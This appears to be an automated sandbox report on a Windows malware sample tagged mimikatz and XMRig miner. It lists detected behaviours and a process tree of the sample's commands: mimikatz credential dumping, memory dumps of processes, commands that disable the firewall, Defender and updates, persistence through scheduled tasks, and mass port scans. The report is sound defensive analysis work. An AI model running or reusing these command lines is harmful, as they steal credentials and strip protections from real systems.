Overview

overview

10

Static

static

10

2025-01-06...tz.exe

windows7-x64

10

2025-01-06...tz.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-01-2025 23:53

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2025-01-06_99d86107ecf4c088cd18d168dffa1344_hacktools_icedid_mimikatz.exe

  • Size

    9.6MB

  • MD5

    99d86107ecf4c088cd18d168dffa1344

  • SHA1

    def66ad9780ea3fc15eb940787ede5c883ca44d9

  • SHA256

    d7a374921f8b9db164aa1503029387dc8354ca6435542fcbb8cce5cc22c2e16b

  • SHA512

    6a77cba7ce92ec34002c4dfc201a003bbf01c0637fdb78008b9d62491c2e7b32d29c93bfcf81c586cf253209408c15cadb64f799fef8a77946c351932aaad1e2

  • SSDEEP

    196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1

Score
10/10
mimikatzxmrigcredential_accessdiscoveryevasionexecutionminerpersistenceprivilege_escalationupx

Malware Config

Signatures

  • Disables service(s) 3 TTPs
    evasionexecution
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

    mimikatz
  • Mimikatz family
    mimikatz
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xmrig family
    xmrig
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Contacts a large (30504) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

    credential_access
  • XMRig Miner payload 12 IoCs
    miner
  • mimikatz is an open source tool to dump credentials on Windows 5 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
    persistence
  • Modifies Windows Firewall 2 TTPs 2 IoCs
    evasion
  • Executes dropped EXE 28 IoCs
  • Loads dropped DLL 12 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

    discovery
  • Creates a Windows Service
    persistence
  • Drops file in System32 directory 18 IoCs
  • UPX packed file 36 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • NSIS installer 3 IoCs
    installer
  • Modifies data under HKEY_USERS 43 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:2120
      • C:\Windows\TEMP\eyuduassi\uuetgf.exe
        "C:\Windows\TEMP\eyuduassi\uuetgf.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1344
    • C:\Users\Admin\AppData\Local\Temp\2025-01-06_99d86107ecf4c088cd18d168dffa1344_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2025-01-06_99d86107ecf4c088cd18d168dffa1344_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3176
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\seumlgyb\lebulsi.exe
        2⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:1980
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:3328
        • C:\Windows\seumlgyb\lebulsi.exe
          C:\Windows\seumlgyb\lebulsi.exe
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:4900
    • C:\Windows\seumlgyb\lebulsi.exe
      C:\Windows\seumlgyb\lebulsi.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2284
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2164
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
            PID:4512
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D users
            3⤵
              PID:1536
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
              3⤵
              • System Location Discovery: System Language Discovery
              PID:2848
            • C:\Windows\SysWOW64\cacls.exe
              cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
              3⤵
              • System Location Discovery: System Language Discovery
              PID:1412
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
              3⤵
              • System Location Discovery: System Language Discovery
              PID:1984
            • C:\Windows\SysWOW64\cacls.exe
              cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
              3⤵
              • System Location Discovery: System Language Discovery
              PID:2028
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static del all
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:2272
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add policy name=Bastards description=FuckingBastards
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            PID:4924
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add filteraction name=BastardsList action=block
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:2312
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c C:\Windows\zthyliniv\eftbbbiir\wpcap.exe /S
            2⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3720
            • C:\Windows\zthyliniv\eftbbbiir\wpcap.exe
              C:\Windows\zthyliniv\eftbbbiir\wpcap.exe /S
              3⤵
              • Drops file in Drivers directory
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in System32 directory
              • Drops file in Program Files directory
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:4400
              • C:\Windows\SysWOW64\net.exe
                net stop "Boundary Meter"
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4336
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop "Boundary Meter"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:4852
              • C:\Windows\SysWOW64\net.exe
                net stop "TrueSight Meter"
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3156
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop "TrueSight Meter"
                  5⤵
                    PID:2924
                • C:\Windows\SysWOW64\net.exe
                  net stop npf
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4288
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 stop npf
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:5088
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:1912
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:1688
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c net start npf
              2⤵
              • System Location Discovery: System Language Discovery
              PID:2328
              • C:\Windows\SysWOW64\net.exe
                net start npf
                3⤵
                • System Location Discovery: System Language Discovery
                PID:2136
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 start npf
                  4⤵
                    PID:3664
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c net start npf
                2⤵
                  PID:4516
                  • C:\Windows\SysWOW64\net.exe
                    net start npf
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:1048
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 start npf
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:3152
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c C:\Windows\zthyliniv\eftbbbiir\bdltnuisb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\zthyliniv\eftbbbiir\Scant.txt
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:4756
                  • C:\Windows\zthyliniv\eftbbbiir\bdltnuisb.exe
                    C:\Windows\zthyliniv\eftbbbiir\bdltnuisb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\zthyliniv\eftbbbiir\Scant.txt
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    PID:1112
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c C:\Windows\zthyliniv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\zthyliniv\Corporate\log.txt
                  2⤵
                  • Drops file in Windows directory
                  • System Location Discovery: System Language Discovery
                  PID:4816
                  • C:\Windows\zthyliniv\Corporate\vfshost.exe
                    C:\Windows\zthyliniv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4060
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "heumqybsu" /ru system /tr "cmd /c C:\Windows\ime\lebulsi.exe"
                  2⤵
                    PID:3992
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:2304
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /sc minute /mo 1 /tn "heumqybsu" /ru system /tr "cmd /c C:\Windows\ime\lebulsi.exe"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:3708
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "lgryeyifg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\seumlgyb\lebulsi.exe /p everyone:F"
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:4736
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:4524
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /sc minute /mo 1 /tn "lgryeyifg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\seumlgyb\lebulsi.exe /p everyone:F"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:4476
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "anfnabsvu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\eyuduassi\uuetgf.exe /p everyone:F"
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:2608
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:388
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /sc minute /mo 1 /tn "anfnabsvu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\eyuduassi\uuetgf.exe /p everyone:F"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:5036
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:4068
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:1016
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:852
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static set policy name=Bastards assign=y
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:3244
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:5044
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:536
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:1496
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static set policy name=Bastards assign=y
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:4056
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:1960
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:2328
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:1324
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static set policy name=Bastards assign=y
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:4980
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net stop SharedAccess
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:3812
                    • C:\Windows\SysWOW64\net.exe
                      net stop SharedAccess
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:5048
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 stop SharedAccess
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:3780
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c netsh firewall set opmode mode=disable
                    2⤵
                      PID:3040
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh firewall set opmode mode=disable
                        3⤵
                        • Modifies Windows Firewall
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:4804
                    • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                      C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 772 C:\Windows\TEMP\zthyliniv\772.dmp
                      2⤵
                      • Executes dropped EXE
                      • Modifies data under HKEY_USERS
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1944
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c netsh Advfirewall set allprofiles state off
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:2316
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh Advfirewall set allprofiles state off
                        3⤵
                        • Modifies Windows Firewall
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:4656
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c net stop MpsSvc
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:2164
                      • C:\Windows\SysWOW64\net.exe
                        net stop MpsSvc
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:4536
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop MpsSvc
                          4⤵
                            PID:1092
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c net stop WinDefend
                        2⤵
                          PID:1416
                          • C:\Windows\SysWOW64\net.exe
                            net stop WinDefend
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:1948
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 stop WinDefend
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:2408
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c net stop wuauserv
                          2⤵
                            PID:4052
                            • C:\Windows\SysWOW64\net.exe
                              net stop wuauserv
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:1632
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop wuauserv
                                4⤵
                                  PID:1800
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c sc config MpsSvc start= disabled
                              2⤵
                              • System Location Discovery: System Language Discovery
                              PID:2764
                              • C:\Windows\SysWOW64\sc.exe
                                sc config MpsSvc start= disabled
                                3⤵
                                • Launches sc.exe
                                • System Location Discovery: System Language Discovery
                                PID:1908
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c sc config SharedAccess start= disabled
                              2⤵
                                PID:3136
                                • C:\Windows\SysWOW64\sc.exe
                                  sc config SharedAccess start= disabled
                                  3⤵
                                  • Launches sc.exe
                                  • System Location Discovery: System Language Discovery
                                  PID:756
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c sc config WinDefend start= disabled
                                2⤵
                                • System Location Discovery: System Language Discovery
                                PID:2036
                                • C:\Windows\SysWOW64\sc.exe
                                  sc config WinDefend start= disabled
                                  3⤵
                                  • Launches sc.exe
                                  PID:3708
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c sc config wuauserv start= disabled
                                2⤵
                                • System Location Discovery: System Language Discovery
                                PID:4168
                                • C:\Windows\SysWOW64\sc.exe
                                  sc config wuauserv start= disabled
                                  3⤵
                                  • Launches sc.exe
                                  • System Location Discovery: System Language Discovery
                                  PID:3992
                              • C:\Windows\TEMP\xohudmc.exe
                                C:\Windows\TEMP\xohudmc.exe
                                2⤵
                                • Executes dropped EXE
                                • Drops file in System32 directory
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of SetWindowsHookEx
                                PID:3636
                              • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                                C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 336 C:\Windows\TEMP\zthyliniv\336.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1676
                              • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                                C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 2120 C:\Windows\TEMP\zthyliniv\2120.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2588
                              • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                                C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 2656 C:\Windows\TEMP\zthyliniv\2656.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1328
                              • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                                C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 2748 C:\Windows\TEMP\zthyliniv\2748.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1324
                              • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                                C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 2816 C:\Windows\TEMP\zthyliniv\2816.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3724
                              • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                                C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 3144 C:\Windows\TEMP\zthyliniv\3144.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5116
                              • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                                C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 3848 C:\Windows\TEMP\zthyliniv\3848.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2028
                              • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                                C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 3940 C:\Windows\TEMP\zthyliniv\3940.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4880
                              • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                                C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 4044 C:\Windows\TEMP\zthyliniv\4044.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3048
                              • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                                C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 1028 C:\Windows\TEMP\zthyliniv\1028.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4548
                              • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                                C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 3504 C:\Windows\TEMP\zthyliniv\3504.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2348
                              • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                                C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 3964 C:\Windows\TEMP\zthyliniv\3964.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4292
                              • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                                C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 1408 C:\Windows\TEMP\zthyliniv\1408.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1040
                              • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                                C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 2516 C:\Windows\TEMP\zthyliniv\2516.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4052
                              • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                                C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 4812 C:\Windows\TEMP\zthyliniv\4812.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1676
                              • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                                C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 3476 C:\Windows\TEMP\zthyliniv\3476.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3140
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c C:\Windows\zthyliniv\eftbbbiir\scan.bat
                                2⤵
                                  PID:436
                                  • C:\Windows\zthyliniv\eftbbbiir\ysesbhsym.exe
                                    ysesbhsym.exe TCP 181.215.0.1 181.215.255.255 7001 512 /save
                                    3⤵
                                    • Executes dropped EXE
                                    • Drops file in Windows directory
                                    PID:3972
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                  2⤵
                                    PID:3296
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1280
                                    • C:\Windows\SysWOW64\cacls.exe
                                      cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:4628
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:5024
                                    • C:\Windows\SysWOW64\cacls.exe
                                      cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:3984
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                      3⤵
                                        PID:4524
                                      • C:\Windows\SysWOW64\cacls.exe
                                        cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1192
                                  • C:\Windows\SysWOW64\tyttue.exe
                                    C:\Windows\SysWOW64\tyttue.exe
                                    1⤵
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of SetWindowsHookEx
                                    PID:3192
                                  • C:\Windows\system32\cmd.EXE
                                    C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\seumlgyb\lebulsi.exe /p everyone:F
                                    1⤵
                                      PID:4180
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                        2⤵
                                          PID:4428
                                        • C:\Windows\system32\cacls.exe
                                          cacls C:\Windows\seumlgyb\lebulsi.exe /p everyone:F
                                          2⤵
                                            PID:2136
                                        • C:\Windows\system32\cmd.EXE
                                          C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\eyuduassi\uuetgf.exe /p everyone:F
                                          1⤵
                                            PID:3060
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                              2⤵
                                                PID:4028
                                              • C:\Windows\system32\cacls.exe
                                                cacls C:\Windows\TEMP\eyuduassi\uuetgf.exe /p everyone:F
                                                2⤵
                                                  PID:936
                                              • C:\Windows\system32\cmd.EXE
                                                C:\Windows\system32\cmd.EXE /c C:\Windows\ime\lebulsi.exe
                                                1⤵
                                                  PID:4400
                                                  • C:\Windows\ime\lebulsi.exe
                                                    C:\Windows\ime\lebulsi.exe
